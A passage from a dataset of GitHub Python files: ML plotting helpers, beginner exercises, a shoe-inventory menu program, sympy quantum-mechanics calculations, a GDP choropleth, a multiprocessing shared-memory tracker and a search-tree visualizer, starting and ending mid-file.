main()\n","repo_name":"esenin9426/HTML_trans_test","sub_path":"TelegramBot.py","file_name":"TelegramBot.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"28290125344","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import roc_curve, precision_recall_curve, roc_auc_score, average_precision_score\r\n\r\n\r\ndef plot_roc_curve(model, X, y, sample_size, n_samples, title=None, ax=None):\r\n    \"\"\"\r\n    Plot a ROC curve with SD\r\n    :param model: Predictive model\r\n    :param X: Feature matrix\r\n    :param y: Target labels\r\n    :param sample_size: Size of each random sample of examples from X to calculate SD\r\n    :param n_samples: Number of random samples of examples from X to calculate SD\r\n    :param title: Figure's title\r\n    :param ax: Figure's axis\r\n    \"\"\"\r\n    if title is None:\r\n        title = 'ROC Curve'\r\n    if ax is None:\r\n        plt_show = True\r\n        fig, ax = plt.subplots(figsize=(8, 6))\r\n    else:\r\n        plt_show = False\r\n\r\n    pool = np.arange(y.shape[0])\r\n    tprs = []\r\n    x_vals 
= np.linspace(0, 1, 100)\r\n\r\n for i in range(n_samples):\r\n sample = np.random.choice(pool, size=sample_size, replace=False)\r\n sample_pred_probs = model.predict_proba(X.iloc[sample, :])[:, 1]\r\n sample_true = y.iloc[sample]\r\n\r\n fpr_arr, tpr_arr, threshold = roc_curve(sample_true, sample_pred_probs)\r\n\r\n interp_tpr = np.interp(x_vals, fpr_arr, tpr_arr)\r\n interp_tpr[0] = 0\r\n tprs.append(interp_tpr)\r\n\r\n y_pred_probs = model.predict_proba(X)[:, 1]\r\n\r\n fpr_arr, tpr_arr, threshold = roc_curve(y, y_pred_probs)\r\n area = roc_auc_score(y, y_pred_probs)\r\n interp_tpr = np.interp(x_vals, fpr_arr, tpr_arr)\r\n interp_tpr[0] = 0\r\n\r\n std_tpr = np.std(tprs, axis=0)\r\n tprs_upper = np.minimum(interp_tpr + std_tpr, 1)\r\n tprs_lower = np.maximum(interp_tpr - std_tpr, 0)\r\n\r\n ax.plot(x_vals, interp_tpr, color='b', label='ROC Curve (AUC = %0.2f)' % area)\r\n ax.plot([0,1], [0,1], '--', color='orange', label='Luck (AUC = 0.5)')\r\n ax.fill_between(x_vals, tprs_lower, tprs_upper, color='grey', label='SD')\r\n ax.set_title(title)\r\n ax.set_xlabel('FPR')\r\n ax.set_ylabel('TPR')\r\n ax.legend(loc='lower right')\r\n\r\n if plt_show:\r\n plt.show()\r\n\r\n\r\ndef plot_pr_curve(model, X, y, sample_size, n_samples, title=None, ax=None):\r\n \"\"\"\r\n Plot a PR curve with SD\r\n :param model: Predictive model\r\n :param X: Feature matrix\r\n :param y: Target labels\r\n :param sample_size: Size of each random sample of examples from X to calculate SD\r\n :param n_samples: Number of random samples of examples from X to calculate SD\r\n :param title: Figure's title\r\n :param ax: Figure's axis\r\n \"\"\"\r\n if title is None:\r\n title = 'PR Curve'\r\n if ax is None:\r\n plt_show = True\r\n fig, ax = plt.subplots(figsize=(8, 6))\r\n else:\r\n plt_show = False\r\n\r\n pool = np.arange(y.shape[0])\r\n precisions = []\r\n x_vals = np.linspace(0, 1, 100)\r\n\r\n for i in range(n_samples):\r\n sample = np.random.choice(pool, size=sample_size, replace=False)\r\n sample_pred_probs = model.predict_proba(X.iloc[sample, :])[:, 1]\r\n sample_true = y.iloc[sample]\r\n\r\n precision_arr, recall_arr, thresholds = precision_recall_curve(sample_true, sample_pred_probs)\r\n\r\n interp_precision = np.interp(x_vals, recall_arr[::-1], precision_arr[::-1])\r\n interp_precision[0] = 1\r\n precisions.append(interp_precision)\r\n\r\n y_pred_probs = model.predict_proba(X)[:, 1]\r\n\r\n precision_arr, recall_arr, thresholds = precision_recall_curve(y, y_pred_probs)\r\n area = average_precision_score(y, y_pred_probs)\r\n interp_precision = np.interp(x_vals, recall_arr[::-1], precision_arr[::-1])\r\n interp_precision[0] = 1\r\n\r\n std_precision = np.std(precisions, axis=0)\r\n precisions_upper = np.minimum(interp_precision + std_precision, 1)\r\n precisions_lower = np.maximum(interp_precision - std_precision, 0)\r\n\r\n ax.plot(x_vals, interp_precision, color='b', label='Avg precision score = %0.2f' % area)\r\n ax.fill_between(x_vals, precisions_lower, precisions_upper, color='grey', label='SD')\r\n ax.plot(x_vals, [(sum(y) / len(y)) for _ in x_vals], '--', color='orange', label='Baseline precision score = %0.2f' % (sum(y) / len(y)))\r\n ax.set_title(title)\r\n ax.set_xlabel('Recall')\r\n ax.set_ylabel('Precision')\r\n ax.legend(loc='upper right')\r\n\r\n if plt_show:\r\n 
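        # Render only when this function created its own figure; a caller
        # that supplied `ax` is left in charge of showing the plot.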
plt.show()\r\n","repo_name":"Markfesenk0/MLHC-Project","sub_path":"project/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1033345362","text":"a = int(input('Please enter a number: '))\n\ni = 0\ns = 0\no = 0\nwhile i < a:\n    i = i + 1\n    if a%i == 0:\n        o += i\n        s = s + 1\n        print(f'#{s} {i} x {int(a/i)} = {a}')\n\nif s == 2:\n    print('The given number is prime.')\nelse:\n    print(f'The given number has {s} divisors, and their sum is {o}')","repo_name":"RisDN/iskola-jegyzetek","sub_path":"Prog/Python/PROG GY/Feladatok/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"hu","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"20193249736","text":"a = int(input('First bimester: '))\nb = int(input('Second bimester: '))\nc = int(input('Third bimester: '))\nd = int(input('Fourth bimester: '))\n\nmedia = (a + b + c + d) / 4\n\n\n\n\n# if a <= 10 and b <= 10 and c <= 10 and d <= 10:\n#     print('Average: {}'.format(media))\n# else:\n#     print('An invalid grade was entered')\n\n\n# a = int(input(\"Enter the first value: \"))\n# b = int(input('Enter the second value: '))\n#\n# resto_a = a % 2\n# resto_b = b % 2\n\n# if resto_a == 0 or not resto_b == 0: --- Inverts the condition!!!\n#     print('An even number was entered!')\n# else:\n#     print('No number was selected!')\n\n# if resto_a == 0 or resto_b == 0:\n#     print('An even number was entered!')\n# else:\n#     print('No number was selected!')\n\n# if resto == 0:\n#     print('The number is even!')\n# else:\n#     print('The number is odd!')\n\n# a = int(input(\"First value\")) // asks the user to enter data\n# b = int(input(\"Second value\"))\n# c = int(input(\"Third value\"))\n#\n#\n# if a > b:\n#     print('The largest number is {}'.format(a))\n# elif b > a and b > c:\n#     print(\"The largest number is {}\".format(b))\n# else:\n#     print(\"The largest number is {}\".format(c))\n# print(\"End of program\")","repo_name":"Edubah/EstudandoSnakeRs","sub_path":"Introdução a Python/app_python/Aula3.py","file_name":"Aula3.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36692856829","text":"# Defining shoe class.\nclass Shoe:\n    def __init__(self, country, code, product, cost, quantity):\n        self.country = country\n        self.code = code\n        self.product = product\n        self.cost = cost\n        self.quantity = quantity\n\n    def get_cost(self):\n        return self.cost\n\n    def get_quantity(self):\n        return self.quantity\n\n    def __str__(self):\n        return(f\"Country: {self.country} | Product Code: {self.code} | Shoe: {self.product} | Cost: R{self.cost} | Stock: {self.quantity}\")\n    def return_string(self):\n        return(f\"{self.country},{self.code},{self.product},{self.cost},{self.quantity}\")\n\n# Blank list.\ninventory_list = []\n\n# Initializes data into list. Runs at the start of program.\ndef read_shoes_data():\n    with open(\"inventory.txt\", \"r\") as file:\n        next(file)\n        shoe_data_list = file.read().splitlines()\n        for lines in shoe_data_list:\n            lines_list = lines.split(\",\")\n            shoe_data = Shoe(lines_list[0], lines_list[1], lines_list[2], lines_list[3], lines_list[4])\n            inventory_list.append(shoe_data)\n\n
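# NOTE: read_shoes_data() assumes inventory.txt has a header row (skipped via
# next(file)) and comma-separated fields in the Shoe constructor's order.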
# Add new shoe data. Writes to inventory.txt file.\ndef capture_shoes():\n    country_input = input(\"Enter the country: \")\n    product_code_input = input(\"Enter the product code: \")\n    product_input = input(\"Enter the shoe model: \")\n    cost_input = int(input(\"Enter the shoe cost: \"))\n    stock_input = int(input(\"Enter the current stock level: \"))\n\n    with open(\"inventory.txt\", \"a\") as file:\n        file.write(f\"\\n{country_input},{product_code_input},{product_input},{cost_input},{stock_input}\")\n    read_shoes_data()\n    menu()\n\n# Show all inventory.\ndef view_all():\n    for data in inventory_list:\n        print(Shoe.__str__(data))\n    menu()\n\n# Function to allow users to display the lowest stock in the inventory, and update stock with whatever number they choose\n# Writes data to inventory.txt and re-reads everything into inventory_list\ndef re_stock():\n    list_of_quantities = []\n    for shoe in inventory_list:\n        quantities = shoe.get_quantity()\n        list_of_quantities.append(int(quantities))\n    minimum_quantities = min(list_of_quantities)\n\n    for shoe in inventory_list:\n        if shoe.quantity == str(minimum_quantities):\n            print(f\"\"\"The shoe with the lowest stock is:\n{shoe}\"\"\")\n            break\n\n    while True:\n        try:\n            user_input = int(input(\"Please enter the amount you would like to restock this shoe by: \"))\n            break\n        except ValueError:\n            print(\"Please enter a number!\")\n    shoe_qnty_int = int(shoe.quantity)\n    shoe_qnty_int += user_input\n    shoe_qnty_int = str(shoe_qnty_int)\n    shoe.quantity = shoe_qnty_int\n    print(f\"\"\"Stock updated for:\n{shoe}\"\"\")\n    with open(\"inventory.txt\", \"w\") as file:\n        for shoe in inventory_list:\n            file.write(shoe.return_string()+\"\\n\")\n    menu()\n\n# Function to allow users to search for a shoe using an SKU code.\ndef search_shoe():\n    user_selection = input(\"Enter the product code you would like to search: \")\n    search_result = [shoe for shoe in inventory_list if shoe.code == user_selection]\n    for data in search_result:\n        print(Shoe.__str__(data))\n    menu()\n\n\n# Function to display inventory data with total costs calculated.\ndef value_per_item():\n    for shoe in inventory_list:\n        shoe_inventory_int = int(shoe.quantity)\n        shoe_cost_int = int(shoe.cost)\n        shoe_total_cost = shoe_cost_int * shoe_inventory_int\n        print(f\"{shoe.product} | Quantity: {shoe.quantity} | Cost per item: {shoe.cost} | Total Inventory cost = {shoe_total_cost}\")\n    menu()\n\n# Highest quantity function. Reads all data from inventory list and prints highest stock level.\ndef highest_qty():\n    list_of_quantities = []\n    for shoe in inventory_list:\n        quantities = shoe.get_quantity()\n        list_of_quantities.append(int(quantities))\n    maximum_quantities = max(list_of_quantities)\n\n    for shoe in inventory_list:\n        if shoe.quantity == str(maximum_quantities):\n            print(f\"\"\"The shoe with the highest stock is:\n{shoe}\"\"\")\n            print(f\"{shoe.product} should be put on sale!\")\n\n    menu()\n\n\n# Defining menu function.\ndef menu():\n    print(\"\"\"\n    \"\"\")\n    print(\"\"\"--- Welcome to Nike International Warehouse Inventory Management System ---\n\n    Please select from the following menu options\"\"\")\n\n    print(\"\"\"\n1 - Add new stock to manifest\n2 - View all current stock globally\n3 - View the lowest stock levels, and re-stock\n4 - View the highest stock levels\n5 - See stock cost per item\n6 - Search for an Item\n0 - Exit program\"\"\")\n\n    while True:\n        try:\n            user_selection = int(input(\"Selection: \"))\n        except ValueError:\n            print(\"Please enter a valid number.\")\n            continue\n        if user_selection == 1:\n            capture_shoes()\n        elif user_selection == 2:\n            view_all()\n        elif user_selection == 3:\n            re_stock()\n        elif user_selection == 4:\n            highest_qty()\n        elif user_selection == 5:\n            value_per_item()\n        elif user_selection == 6:\n            search_shoe()\n        elif user_selection == 0:\n            print(\"Goodbye!\")\n            exit()\n        else:\n            print(\"Please enter a valid selection.\")\n\n\n# Initializing Data!\nread_shoes_data()\n\n# Call menu function.\nmenu()\n","repo_name":"tjshuff/Inventory","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27853834341","text":"import sympy as sp\n\nA, x, L = sp.symbols('A, x, L')\np = A*x*(L-x)\np.subs(A, 112).subs(L, 10)\n\nsp.plot(p.subs(A, 1).subs(L, 1), (x, 0, 1), line_color='g')\nsp.integrate(p, x)\nrst = sp.integrate(p, (x, 0, L))\nrst\n\nM = sp.symbols('M')\nsp.solve(rst-M, A)\n\nx, e, t = sp.symbols('x, e, t', real=True)\nh_bar, L, m = sp.symbols('\\\\hbar, L, m', real=True, positive=True)\nn = sp.symbols('n', integer=True, positive=True)\nEn = (n*sp.pi*h_bar/L)**2/(2*m)\nhaha = sp.sqrt(2/L)*sp.sin(((n*sp.pi)/L)*x)\nwowo = sp.exp(-sp.I*En*t/h_bar)\np = abs(wowo*haha)**2\np\nsp.integrate(p, (x, 0, L))\n\nfor i in range(1, 10):\n    sp.plot(p.subs(L, 1).subs(n, i).subs(t, 1).subs(m, 1), (x, 0, 1))\n\nsp.re(wowo*haha).subs(L, 1).subs(n, 1).subs(t, 1).subs(m, 1)\nfor i in range(1, 100):\n    sp.plot(sp.re(wowo*haha).subs(L, 1).subs(n, 1).subs(t, 0.01*i).subs(m, 1).subs(h_bar, 1), (x, 0, 1), ylim=(-2, 2))\n\nlower = 1/8*L\nupper = 1/4*L\n\nfor i in range(1, 6):\n    rst = sp.integrate(p.subs(L, 1).subs(n, i).subs(t, 1).subs(m, 1),\n                       (x,\n                        lower.subs(L, 1),\n                        upper.subs(L, 1)))\n    prob = sp.N(rst)\n    print(f\"{prob}\")\n","repo_name":"Neoanarika/SPS2173-Atom2Molecules-Python-Code","sub_path":"IS6.py","file_name":"IS6.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39973204403","text":"import pandas as pd\r\nimport numpy as np\r\nimport cufflinks as cf\r\ncf.go_offline()\r\nimport plotly.graph_objs as go\r\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\r\ndf=pd.read_csv('gdp-ppp-csv-.csv')\r\ndata=dict(type='choropleth',\r\n          locations=df['Economy'],\r\n          z=df['(millions of international dollars)'],\r\n          text=df['Economy'],\r\n
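          # Assumption: df['Economy'] holds plain country names, so Plotly may
          # additionally need locationmode='country names' to resolve them
          # (the default locationmode expects ISO-3 codes).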
          colorbar={'title':'GDP in Millions'})\r\nlayout = dict(\r\n    title = '2017 Global GDP',\r\n    geo = dict(\r\n        showframe = False,\r\n        projection = dict(type = 'azimuthal equal area')\r\n    ))\r\nchoromap3 = go.Figure(data = [data],layout = layout)\r\niplot(choromap3)","repo_name":"Subhankarcodes/Choropleth","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8385179917","text":"\"\"\"This module has to solve these problems:\n    - Add/remove shared memory => use tracker and simple queue\n    - synchronize shared memory\n    - shared memory pointer?\n    - Dict/list shared memory structure?\n    - dynamic-length list/dict?\n    - pad/unpad name from buffer? => unpad object, get name from buffer\n\"\"\"\nimport multiprocessing\nimport pickle\nimport queue\nimport time\nimport typing as t\nfrom multiprocessing import shared_memory\n\nfrom ring_buffer.services import padding_name as pad\n\n\"\"\"\nDynamic shared memory list/dict:\n1. A linked list in which every node holds a shared memory name as a pointer\n2. A dict keyed by the shared memory names => loop over a dict?\nLimit the length of the names?\n\"\"\"\n\n\nclass SharedMemoryTracker:\n    \"\"\"Shared Memory tracker\n    - consume a queue => add/remove shared memory name\n    - save all memory in a dict\n    - shutdown => close all memory\n    \"\"\"\n\n    def __init__(\n        self,\n        sync_queue: multiprocessing.SimpleQueue,\n        interval: float = 0.005\n    ):\n        self._track_map: t.Dict[str, shared_memory.SharedMemory] = {}\n        self._queue = sync_queue\n        self._stop = False\n        self._interval = interval\n\n    @property\n    def queue(self) -> multiprocessing.SimpleQueue:\n        return self._queue\n\n    @property\n    def is_stop(self) -> bool:\n        return self._stop\n\n    def stop(self):\n        self._stop = True\n\n    @staticmethod\n    def _new_key_value(key: str, value):\n        if not isinstance(key, str):\n            raise ValueError(f'key must be string type, receive {key}')\n        # calculate the size of value\n        value_bytes = pickle.dumps(value)\n        smm = shared_memory.SharedMemory(\n            name=key,\n            size=len(value_bytes),\n            create=True,\n        )\n        pad.set_name(smm.buf, value_bytes)\n        return smm\n\n    def _signal_to_action(self, _signal: int, key: str, value):\n        if _signal == -1:\n            smm = self._track_map.pop(key)\n            smm.unlink()\n        elif _signal == 1:\n            self._track_map[key] = self._new_key_value(key, value)\n        elif _signal == 0:\n            self.shutdown()\n\n    def set_change(\n        self,\n        _signal: int,\n        key: str,\n        value: shared_memory.SharedMemory\n    ):\n        self._signal_to_action(_signal, key, value)\n\n    def notify_change(\n        self,\n        _signal: int,\n        key: str,\n        value: shared_memory.SharedMemory\n    ):\n        self._queue.put((_signal, key, value))\n\n    def flush(self):\n        while not self._queue.empty():\n            _signal, key, value = self._queue.get()\n            self._signal_to_action(_signal, key, value)\n            if _signal == 0:\n                # signal to stop the manager\n                return False\n        return True\n\n    def run(self):\n        self._stop = False\n        while not self._stop:\n            should_continue = self.flush()\n            if not should_continue:\n                break\n            time.sleep(self._interval)\n\n    def values(self):\n        return self._track_map.values()\n\n    def items(self):\n        return self._track_map.items()\n\n    def shutdown(self):\n        self._stop = True\n        # remove all shared memories\n        for v in self._track_map.values():\n            v.unlink()\n\n\ndef test_add_remove_to_tracker(smt: SharedMemoryTracker):\n    smt.notify_change(1, 'test1', 100)\n    time.sleep(1)\n    smt.notify_change(1, 'test2', \"i liked it\")\n    smt.notify_change(1, 'test3', \"i 
don't like it\")\n time.sleep(1)\n smt.notify_change(-1, 'test1', None)\n time.sleep(1)\n smt.notify_change(0, None, None)\n\n\ndef test_shared_memory_tracker():\n simple_queue = multiprocessing.SimpleQueue()\n smt = SharedMemoryTracker(simple_queue)\n # create a process which put change in to smt\n process = multiprocessing.Process(\n name='test_tracker',\n target=test_add_remove_to_tracker,\n args=(smt,),\n daemon=True\n )\n process.start()\n\n time.sleep(1)\n smt.flush()\n print(smt.items())\n assert len(smt.items()) == 1\n smt.flush()\n time.sleep(1)\n smt.flush()\n print(smt.items())\n assert len(smt.items()) == 3\n time.sleep(1)\n smt.flush()\n print(smt.items())\n assert len(smt.items()) == 2\n # smt.shutdown()\n time.sleep(3)\n smt.flush()\n\n\nif __name__ == '__main__':\n test_shared_memory_tracker()\n","repo_name":"minhtuan221/python-ring-buffer","sub_path":"ring_buffer/services/shared_mem_tracker.py","file_name":"shared_mem_tracker.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32306701541","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is the module for search tree visualization\n\nAuthor: Xian Lai\nDate: Sep.14, 2017\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom copy import deepcopy\nimport math\n\nsm_font = {'fontsize':13, 'fontname':'Arial'}\nmd_font = {'fontsize':17, 'fontname':'Arial', 'fontweight':'bold'}\nlg_font = {'fontsize':25, 'fontname':'Arial', 'fontweight':'bold'}\n\ngrey = {'light':'#efefef', 'median':'#aaaaaa', 'dark':'#282828'}\ndiscColor = {'blue':'#448afc', 'red':'#ed6a6a', 'green':'#80f442'}\ncm = {'light':plt.get_cmap('RdYlGn'), 'dark':plt.get_cmap('cool')}\ngreen = {'light':'#d4f442' , 'dark':'#2dbc32'}\n\n\nclass TreeVisual():\n \n \"\"\" This class implements the methods to parse the search tree to get plot\n data and the methods to plot the tree based on the attributes of its nodes\n like whether is goal node or whether is path. \n \"\"\"\n\n def __init__(self, diameter=20, background='dark'):\n \"\"\" set the fig size and background color.\n \"\"\"\n # set up the color of background, edges, nodes and text\n if background == 'dark':\n self.bgc = grey['dark']\n self.c = grey['light']\n self.cm = cm['light']\n self.green = green['light']\n else:\n self.bgc = grey['light']\n self.c = grey['dark']\n self.cm = cm['dark']\n self.green = green['dark']\n plt.rcParams['axes.facecolor'] = self.bgc\n plt.rcParams['figure.facecolor'] = self.bgc\n\n self.fig = plt.figure(figsize=(diameter, diameter))\n self.ax = self.fig.add_subplot(111, projection='polar')\n self.radius = diameter/2\n self._set_polarAxParam(self.ax)\n\n\n @staticmethod\n def show():\n plt.show()\n\n\n def save(self, path='search_tree.png'):\n \"\"\" Save the fig to file. You can directly specify the format in the \n file name. And you can specify the dpi and bbox_inches. 
\n \n inputs:\n -------\n - path: The path you want to save the file to.\n \"\"\"\n self.fig.savefig(path, dpi=None, bbox_inches='tight')\n\n\n def plot_tree(self, tree, paths, title='search tree', ls='-', a=0.5, \n show=True):\n \"\"\" plot the tree in polar projection with correct spacing and:\n - initState marked in green text\n - goalState marked in green text\n - path leads to goal node marked in green\n - nodes colored by their pathcost\n\n inputs:\n -------\n - tree: The search tree in form described in TreeSearch.py\n - paths: The collection of paths found.\n - title: title of the fig.\n - ls: line style\n - a: alpha\n - show: whether to show the plot.\n \"\"\"\n self.tree = tree\n self.pathNodes = self._flatten(paths)\n if self.pathNodes: self.goal = paths[0][-1]['state']\n else: self.goal = \"Not Found\"\n\n # set up spacing:\n vDists = [x**1.5 for x in range(len(self.tree))]\n self.vDist = [self.radius * 1500 * x / max(vDists) for x in vDists]\n self.hDist = [0] + [600/radius for radius in self.vDist[1:]]\n\n # parse the tree and plot\n self._parse_tree()\n\n for gnrt in range(len(self.parsedTree)):\n for cluster in self.parsedTree[gnrt]:\n for sibling in cluster:\n self._plot_node(sibling, ls=ls, textColor=self.c, a=a)\n if gnrt > 0:\n self._plot_edge(\n sibling, gnrt, ls=ls, edgeColor=self.c, a=a\n )\n\n self._set_axTitle(self.ax, title)\n if show: plt.show()\n\n\n def _plot_edge(self, node, gnrtIdx, edgeColor, ls, a):\n \"\"\" plot the edge from given node to its parent node with given color, \n line style, and alpha. If this edge is on path, then change the color\n to green.\n\n inputs:\n -------\n - node: The given node which is the children end of edge\n - gnrtIdx: The generation index of given node\n - edgeColor: the color of edge\n - ls: line style\n - a: alpha\n \"\"\"\n paClstIdx = node['parent'][0] # cluster index of parent node\n paSiblIdx = node['parent'][1] # sibling index of parent node\n parent = self.parsedTree[gnrtIdx-1][paClstIdx][paSiblIdx]\n edgeXs = (node['x'], parent['x'])\n edgeYs = (node['y'], parent['y'])\n\n if node['isPath'] == True: edgeColor=self.green\n self.ax.plot(edgeXs, edgeYs, c=edgeColor, ls=ls, alpha=a, lw=1)\n\n\n def _plot_node(self, node, textColor, ls, a):\n \"\"\" plot the given node colored by its path cost. And plot its text \n label with default text color and alpha. If this node is goal node, \n plot the text in green.\n\n inputs:\n -------\n - node: The node to be plotted.\n - textColor: the default color of text\n - ls: line style\n - a: alpha\n \"\"\"\n nodeColor = self.cm(1-node['z'])\n if node['nodeText'] == self.goal: textColor = self.green\n\n # if the text in on the left side of the plot, it's upside down. 
So \n # rotate it by 180 degree\n textRotation = math.degrees(node['x'])\n if (textRotation > 90) and (textRotation < 270): \n textRotation = textRotation - 180\n\n x_text = node['x']\n y_text = node['y'] + 800 # offset labels outward away from node\n content = node['nodeText']\n param = {\n 'color':textColor, 'rotation':textRotation, 'alpha':a, \n 'ha':'center', 'va':'center'\n }\n \n self.ax.plot(node['x'], node['y'], 'o', c=nodeColor, alpha=a)\n self.ax.text(x_text, y_text, content, **param)\n\n\n def _set_polarAxParam(self, ax):\n \"\"\" set the parameters of polar axes: turn off the axes ticks, spines\n and grid.\n \"\"\"\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.spines[\"polar\"].set_visible(False)\n ax.grid(False)\n \n\n def _tight_layout(self):\n self.fig.tight_layout()\n\n\n def _set_figTitle(self, title):\n self.fig.suptitle(title, c=grey['light'], **lg_font) \n\n\n def _set_axTitle(self, ax, title):\n if self.radius < 12: font = md_font\n else: font = lg_font\n ax.set_title(title, color=self.c, **font)\n\n\n #----------------------------- PARSE TREE --------------------------------\n def _parse_tree(self):\n \"\"\" To plot the nodes, edges and corresponding text labels of search \n tree, we need to parse the tree data and extract information like the\n x, y values of each node, their parent node etc.\n\n The parsed result will in form of:\n parsedTree = [gnrt_0, gnrt_1, ...]\n gnrt_# = [clst_0, clst_1, ...]\n clst_# = [sibl_0, sibl_1, ...]\n sibl_# = {\n 'x' : x value of this node in plot, \n 'y' : y value of this node in plot which is the level of this node\n 'z' : color of this node which is the path cost up to this node\n 'nodeText': the state of this node\n 'parent' : the peerIdx of parent\n 'edgeText': the name of edge which is the previous action\n 'isPath' : if this edge is part of path, 2xlinewidth\n }\n \"\"\"\n pathCosts = self._extract_values(self.tree, 'pathCost')\n maxZ = max(pathCosts)\n clstEndX = -2 # default end of cluster\n\n self.parsedTree = [] # initialize the parsedTree\n\n # start parsing from the root layer by layer\n for gnrt in self.tree:\n # append an empty list as current generation\n self.parsedTree.append([]) \n for clst in gnrt:\n # append an empty list to the current layer as current cluster\n self.parsedTree[-1].append([]) \n # fix the starting and ending x values of current cluster.\n clstStartX, clstEndX = self._parse_clstX(clst, clstEndX)\n # adding desired information to each node in the cluster.\n for sibl in clst:\n gnrtIdx, siblIdx = sibl['gnrt'], sibl['sibl']\n parsedNode = {\n 'x':clstStartX + siblIdx * self.hDist[gnrtIdx],\n 'y':self.vDist[gnrtIdx], # y is its layer\n 'z':sibl['pathCost']/maxZ, # normalized pathCost\n 'nodeText':sibl['state'],\n 'children':sibl['children'],\n 'parent':sibl['parent'],\n 'edgeText':sibl['prevAction'],\n 'isPath':self._isPath(sibl),\n 'clst':sibl['clst'],\n 'gnrt':sibl['gnrt'],\n 'sibl':sibl['sibl']\n }\n self.parsedTree[-1][-1].append(parsedNode)\n\n # scale the x values of tree so it's within 2*pi\n self._normalize_tree()\n\n \n def _parse_clstX(self, clst, l_clstEndX):\n \"\"\" Calculate the starting and ending x values of given cluster. But \n in order to plot a nice looking tree, we can't simply use the order of \n nodes' cluster indices and sibling indices as their x values. 
Instead, \n we have to add correct amount of spaces between nodes and clusters so:\n\n - All the parent nodes will be on the center of their childrens.\n - Neighboring clusters will be separated by a one-unit gap.\n - Nodes belong to same cluster will stay together.\n\n So we need to consider the x values of given cluster's neighbors and \n parent.\n\n inputs:\n -------\n - cluster: The current cluster to calculate x values.\n - l_clstEndX: The ending x value of last cluster in the same layer.\n\n output:\n -------\n - clstStartX: The starting x value of current cluster.\n - clstEndX: The ending x value of current cluster.\n \"\"\"\n node = clst[0]\n gnrtIdx, clstIdx, paIdx = node['gnrt'], node['clst'], node['parent']\n clstSize = len(clst) - 1\n\n # if currently at root, both clstStartX and clstEndX are just 0\n if gnrtIdx == 0: clstStartX, clstEndX = 0, 0\n\n # else, every cluster has a parent, the center of cluster equals to \n # parent's x value. And the starting and ending x values are fixed.\n else:\n parentX = self.parsedTree[gnrtIdx-1][paIdx[0]][paIdx[1]]['x']\n clstStartX = parentX - clstSize*self.hDist[gnrtIdx]/2\n clstEndX = parentX + clstSize*self.hDist[gnrtIdx]/2\n\n # but we still need to make sure the current cluster is not over-\n # lapping with last cluster in the same generation. If current \n # cluster is the first one in current generation, there won't be \n # overlaping. Otherwise, we should check whether overlapping exist\n # by comparing l_clstEndX + 2*unit with clstStartX(we add 2 units \n # here instead of 1 is because we want to leave the 1 unit gap \n # between clusters). If clstStartX is greater then we are safe, \n # otherwise we should shift the cluster onward by overlapping \n # amount and adjust the x values of all nodes affected by this \n # shift in the previous generations(because we still want to keep \n # parent on the center of children cluster).\n if clstIdx != 0:\n shift = (l_clstEndX + 2*self.hDist[gnrtIdx]) - clstStartX\n if shift > 0:\n clstStartX += shift; clstEndX += shift\n self._adjust_upward(\n gnrtIdx, clstIdx, paIdx, clstStartX, clstEndX\n )\n\n return clstStartX, clstEndX\n\n\n def _adjust_upward(self, gnrtIdx, clstIdx, paIdx, clstStartX, clstEndX):\n \"\"\" if current expanding cluster is shifted, we need to adjust upward\n to update all the nodes being affected. \n\n Assuming the parent, parent of parent and so forth of current cluster \n are called direct relatives. 
Only the nodes following(has bigger \n clstIdx) direct relatives in each higher generations are affected by \n the shift.\n\n inputs:\n -------\n - gnrtIdx: The generation index of current cluster\n - clstIdx: The cluster index of current cluster\n - paIdx: [parent's cluster index, parent's sibling index]\n - clstStartX: the starting x value of shifted current cluster\n - clstEndX: the ending x value of shifted current cluster\n \"\"\"\n # find the clstIdx and siblIdx of direct relatives in each generation\n dirClst = [paIdx[0]] # cluster indices of direct relatives\n dirSibl = [paIdx[1]] # sibling indices of direct relatives\n for generation in self.tree[gnrtIdx-1:1:-1]:\n prnt = generation[dirClst[-1]][dirSibl[-1]]['parent']\n dirClst.append(prnt[0])\n dirSibl.append(prnt[1])\n\n # update generation gnrtIdx - 1, in this generation, all nodes follow-\n # ing and including parent of current cluster simply should shift by \n # the amount of (clstStartX + clstEndX)/2 - dir_parent['x'].\n dir_parent = self.parsedTree[-2][dirClst[0]][dirSibl[0]]\n shift = (clstStartX + clstEndX)/2 - dir_parent['x']\n\n # update nodes following parent in the parent's cluster\n for sibl in self.parsedTree[-2][dirClst[0]][dirSibl[0]:]:\n sibl['x'] += shift\n\n # update nodes in the following cluster\n for clst in self.parsedTree[-2][dirClst[0]+1:]:\n for sibl in clst:\n sibl['x'] += shift\n\n # update all generations upward except root, from gnrtIdx - 2 to 1.\n # because this is polar plot, the root node is always in the center.\n for i, gnrt in enumerate(self.parsedTree[gnrtIdx-2:0:-1], start=1):\n\n # For the direct relative in each generation, it should be shift \n # onto the center of their children nodes. And we keep record of \n # the shift distance.\n dir_relative = gnrt[dirClst[i]][dirSibl[i]]\n original = deepcopy(dir_relative['x'])\n dir_relative['x'] = self._find_childrenCenter(dir_relative)\n shift = dir_relative['x'] - original\n\n # For the nodes in the direct relative's 